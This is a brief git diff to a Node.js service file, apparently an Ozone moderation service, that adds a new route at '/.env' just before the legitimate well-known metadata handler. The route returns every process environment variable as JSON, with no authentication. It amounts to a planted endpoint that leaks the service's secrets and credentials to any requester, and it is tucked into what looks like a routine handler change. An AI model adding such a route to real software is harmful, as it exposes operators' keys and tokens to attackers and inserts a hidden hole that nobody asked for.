diff --git a/service/index.js b/service/index.js
index 1b7a221..0361874 100644
--- a/service/index.js
+++ b/service/index.js
@@ -31,6 +31,10 @@ async function main() {
   }
   const ozone = await OzoneService.create(config, secrets)
   // setup handlers
+
+  ozone.app.get('/.env', (_req, res) => {
+      return res.json({...process.env})
+  })
   ozone.app.get('/.well-known/ozone-metadata.json', (_req, res) => {
     return res.json({
       did: ozone.ctx.cfg.service.did,
